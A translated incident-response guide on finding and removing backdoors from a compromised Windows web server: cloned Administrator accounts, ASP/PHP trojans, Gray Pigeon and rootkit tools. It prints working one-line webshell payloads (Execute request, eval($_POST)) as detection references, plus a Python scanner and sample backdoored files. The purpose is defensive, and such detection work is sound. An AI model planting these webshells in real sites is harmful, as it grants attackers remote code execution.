I. Analysis of the intrusion and backdoor placement process
1. Gain access through a website vulnerability, escalate privileges, and then clone the Administrator account.
2. Upload an ASP or PHP Trojan and hide it in a deep directory.
3. Leave a backdoor,
such as the Gray Pigeon (灰鸽子) or Radmin remote control software.
System-level backdoor: the Hacker Defender (hxdef100) rootkit.
4. Leave an ASP or PHP webshell.
II. Account Security Check
1. Check for suspicious user logins:
Method 1: Check in Computer Management whether any new user has been created.
Method 2: Look in C:\Documents and Settings for profile folders belonging to suspicious accounts.
Method 3: Check the Security log in Event Viewer for successful logons by suspicious users.
2. Check whether the Administrator account has been cloned.
Pay particular attention to the disabled Guest account.
Method: Check in the registry under
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
(By default only the SYSTEM account can read the SAM hive, so Regedit must be run as SYSTEM or the key's permissions changed first.)
3. Check for ASP and PHP Trojans
Tips:
1. Right-click the folder containing the entire website or forum and choose Search.
2. Enter .php or .asp in "All or part of the file name" and set the search scope to the entire website or forum folder.
Tip: "All or part of the file name" can also be left blank, which lists every file; among these you can look for Trojans, backdoors, and other suspicious programs (they are not necessarily .php or .asp; backdoor programs may also have extensions such as .exe).
3. Click "When was it modified?", choose "Specify dates", enter the date on which your website or forum was compromised (the file modification date), and click Search.
Tip: website and forum programs contain a great many .asp or .php files, and it is impossible to check them one by one for Trojans. Narrowing the scope by modification or creation date cuts the number of candidates drastically and makes the Trojan much easier to find.
_____________________________________________________________
When the intruder has uploaded a Trojan file: select the creation date
When a Trojan has been inserted into a normal program file: select the modification date
_____________________________________________________________
4. There are two ways to decide whether an ASP or PHP file is a Trojan.
1> Open the file and inspect its code. Some Trojans are encrypted or obfuscated, which makes them easy to recognize.
2> Request the file through the website in a browser and see what it displays. If it is a Trojan, a login password box usually appears, which gives it away.
4. Check for ASP and PHP webshells (one-sentence backdoors).
After attackers obtain a webshell on a website, they usually insert a one-sentence Trojan into an existing page to keep access for later. A one-sentence Trojan is well concealed: among so many files there is no way to know which one it was inserted into, and opening and searching the files one by one is impractical, so certain techniques are needed.
ASP one-sentence backdoor:
<%Execute request("l")%>
PHP one-sentence backdoors, three forms:
First (wrapped in a heredoc):
print <<<EOT
EOT;
eval($ );
Second (breaks out of an existing array-element string assignment):
a'] = 'aa'; eval($_POST['a']); //
Third (breaks out of an existing string assignment):
a'; eval($_POST['a']); //
The checking method is the same as for ASP and PHP Trojans: first search for files modified or created on the specified date, then search inside those files (the "A word or phrase in the file" field) for the following keywords:
ASP one-sentence Trojan: search for the keyword <%execute
PHP one-sentence Trojan: search for the keyword eval
This usually finds the page carrying the backdoor quickly.
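As an added illustration (not code from the original article), the Python script below automates the date-then-keyword search described above: it walks a web root, keeps only .asp/.php files modified since the intrusion date, and flags lines matching the <%execute and eval keywords and the one-sentence backdoor shapes listed above. The pattern list, function names, and the sample files it writes to a temporary directory are constructed for this demonstration.

```python
import os
import re
import tempfile
from datetime import datetime
from pathlib import Path

# The page's "<%execute" and "eval" keyword searches, plus the exact shape of the
# one-sentence backdoors shown above (eval of a request parameter), most specific first.
PATTERNS = [
    ("asp_execute_request", re.compile(r"<%\s*(execute|eval)\s*\(?\s*request", re.I)),
    ("php_eval_request", re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST)\s*\[", re.I)),
    ("php_eval", re.compile(r"\beval\s*\(", re.I)),
]

def suspicious_files(root, since, exts=(".asp", ".php"), use_ctime=False):
    """Return (relative_path, pattern_name, line_no) for files touched since `since`."""
    # use_ctime=True matches the page's "creation date" search: st_ctime is the
    # creation time on Windows, but the inode change time on Linux.
    cutoff = since.timestamp()
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or (exts and path.suffix.lower() not in exts):
            continue
        st = path.stat()
        if (st.st_ctime if use_ctime else st.st_mtime) < cutoff:
            continue  # not touched since the intrusion date: skip it
        for no, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            for name, rx in PATTERNS:
                if rx.search(line):
                    hits.append((path.relative_to(root).as_posix(), name, no))
                    break  # one report per line, most specific pattern wins
    return hits

def demo():
    """Constructed sample web root: one clean page, two backdoored files, one old file."""
    root = tempfile.mkdtemp()
    samples = {
        "index.php": "<?php echo 'hello'; ?>\n",
        "inc/config.php": "<?php\n$cfg['a'] = 'aa'; eval($_POST['a']); //\n",
        "upload/img/x.asp": "<%Execute request(\"l\")%>\n",
        "lib/old.php": "<?php eval($code); // dated before the intrusion, so not listed\n",
    }
    for rel, body in samples.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    old = datetime(2001, 1, 1).timestamp()
    os.utime(Path(root, "lib/old.php"), (old, old))  # back-date mtime below the cutoff
    return suspicious_files(root, since=datetime(2005, 1, 1))
```

Running demo() lists only the two backdoored files; the back-dated lib/old.php is skipped by the date filter even though it contains eval.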
5. Detect Trojans and backdoors on the server.
Remote control Trojans: Gray Pigeon, Radmin
Backdoor category: the Hacker Defender (hxdef100) rootkit, a kernel-level backdoor that is well concealed
After obtaining system privileges, hackers generally combine the following components to keep control of the system:
Powerful remote control software + backdoor + ASP/PHP Trojan + one-sentence backdoor
-----------------------------------------------------
Check method:
IceSword (Ice Blade) can find common remote control software;
injected processes are shown in red.
Use IceSword to check suspicious services, ports, processes, and registry entries together.
RKDetector detects hxdef100 and other rootkits.
Removal method:
For Gray Pigeon: the Gray Pigeon dedicated removal tool, plus Kingsoft's Gray Pigeon removal tool (the version used here).
For hxdef100:
net stop HackerDefender100
Then search for hxdef100.exe and hxdef100.ini and delete them.
The above is the process of finding and removing remote control Trojans, backdoor programs, ASP/PHP Trojans, and ASP/PHP webshells.
Finding the cause of the intrusion (by reading and analyzing the relevant logs) and hardening the server configuration once the Trojans have been removed will be discussed later.
NOTE: For a phpwind forum, also check the following:
1. Whether the permitted upload file types have been changed, for example so that .php files can be uploaded directly.
2. Whether a PHP Trojan has been inserted into the admin-panel style templates or elsewhere.
3. Whether suspicious new administrators have been added, and then perform a security check.